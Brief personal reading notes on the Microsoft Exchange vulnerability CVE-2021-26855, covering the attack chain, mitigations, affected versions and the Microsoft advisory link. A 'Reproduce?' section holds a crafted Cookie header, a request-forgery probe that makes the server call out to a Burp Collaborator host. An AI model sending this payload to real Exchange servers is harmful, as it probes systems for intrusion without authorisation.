CVE-2021-26855: Reading Notes
CVE-2021-26855
Microsoft Exchange Server Remote Code Execution Vulnerability
Released: Mar 2, 2021 Last updated: Mar 11, 2021
But the exploit is not publicly disclosed.
Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft. It runs exclusively on Windows Server operating systems. Oh I’ve used this Microsoft Application…this is bad.
This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. This can be protected against by restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access. Using this mitigation will only protect against the initial portion of the attack. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file.
We recommend prioritizing installing updates on Exchange Servers that are externally facing.
Affected Versions
- Exchange 2013 Versions < 15.00.1497.012
- Exchange 2016 CU18 < 15.01.2106.013
- Exchange 2016 CU19 < 15.01.2176.009
- Exchange 2019 CU7 < 15.02.0721.013
- Exchange 2019 CU8 < 15.02.0792.010
Reproduce?
Tool: burp Collaborator
/x.js
Add Cookie:
Cookie: X-AnonResource=true; X-AnonResource-Backend=<collaborator>/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Reference
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855